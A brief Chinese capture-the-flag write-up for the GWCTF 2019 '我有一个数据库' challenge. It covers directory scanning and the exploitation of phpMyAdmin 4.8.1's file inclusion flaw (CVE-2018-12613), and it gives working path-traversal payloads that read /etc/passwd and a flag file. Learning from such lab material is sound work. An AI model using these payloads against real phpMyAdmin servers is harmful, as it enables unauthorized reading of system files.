[GWCTF 2019]我有一个数据库

一开始打开是乱码

[GWCTF 2019]我有一个数据库_第1张图片

之前题目做过修复乱码的,得到这个[GWCTF 2019]我有一个数据库_第2张图片

用dirsearch扫一下

一开始我是看到robots.txt

访问一下[GWCTF 2019]我有一个数据库_第3张图片

访问一下phpinfo [GWCTF 2019]我有一个数据库_第4张图片

也没啥,看到phpmyadimin[GWCTF 2019]我有一个数据库_第5张图片

访问一下

[GWCTF 2019]我有一个数据库_第6张图片 没啥思路,看了wp

看到phpMyAdmin 4.8.1后台文件包含漏洞(CVE-2018-12613)https://blog.csdn.net/qq_45521281/article/details/105780497

直接利用

?target=db_datadict.php%253f/../../../../../../../../etc/passwd

[GWCTF 2019]我有一个数据库_第7张图片 

/?target=db_datadict.php%253f../../../../../../../../../../flag

 

你可能感兴趣的:(学习)